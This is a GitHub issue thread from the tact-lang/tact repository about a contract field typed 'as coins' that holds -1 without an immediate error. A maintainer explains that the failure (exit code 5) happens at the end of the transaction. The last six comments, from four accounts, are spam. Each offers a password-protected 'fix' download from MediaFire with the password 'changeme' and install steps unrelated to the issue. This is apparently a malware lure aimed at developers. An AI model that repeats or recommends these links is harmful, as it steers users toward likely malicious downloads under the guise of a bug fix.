### ISSUE TITLE
No errors were thrown, but the value of the field is out of the expected range.

### ISSUE THREAD

**Issue by verichenn** [tact-lang/tact#712]
### I expected it to fail, but it didn't.
```
import "@stdlib/deploy";

contract Test with Deployable {

    a: Int as coins = 0; // 0 to 2120 -1

    init(b: Int, c: Int) {
        self.a = b - c;
        dump("a:");
        dump(self.a); // -1
    }
    
}
```
```typescript
import { Blockchain } from "@ton/sandbox";
import { Test } from "../build/Test/tact_Test";
import { toNano } from "@ton/core";

describe('TEST', () => {

    it('1', async () => {
        let blockchain = await Blockchain.create({});

        let deployer = await blockchain.treasury('deployer');
        let test = blockchain.openContract(await Test.fromInit(BigInt(0), BigInt(1)));
        
        await test.send(
            deployer.getSender(),
            {
                value: toNano('0.1'),
            },
            {
                $$type: 'Deploy',
                queryId: 0n,
            }
        );
    });
});
```

**Comment by anton-trunov** [comment]
I tried your example in https://ide.nujan.io and it actually fails in the end, here is the output:

```
Contract deployed on SANDBOX  Contract address: }
Message sent: Deploy, from EQAB..wSnT, to EQD_..CXq1, value 0.05, not bounced
#DEBUG#: File main.tact:9:9:
#DEBUG#: dump("a:")
#DEBUG#: a:
#DEBUG#: File main.tact:10:9:
#DEBUG#: dump(self.a)
#DEBUG#: -1 
Transaction Executed: error, Exit Code: 5, Gas: 0.008741  21:37:06 
Message sent: error, from EQD_..CXq1, to EQAB..wSnT, value 0.040259, bounced
```

It does not fail immediately at `self.a = b - c` and the dumped value of `-1` is expected here, since the contract state gets updated at the very end of a transaction and here `self.a` is still a 257-bit integer in the temporary TVM memory.

**Comment by verichenn** [comment]
My fault, I forgot to check the result of the transaction in the test case.

**Comment by verichenn** [comment]
Thank you for your answer. When I assign values to multiple fields, I can't accurately locate the line of code where the error occurs. I used to be confused by this, but now I think I understand why it happens.

**Comment by anton-trunov** [comment]
Thanks! That's something we should improve in the docs, though. I opened an issue in the Tact docs repo: https://github.com/tact-lang/tact/issues/1095

**Comment by masooddahmedd** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by masooddahmedd** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/6mkbh6xhau31g
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by jia6214876** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by jia6214876** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by NikhilKumar77777** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by Evul88** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."
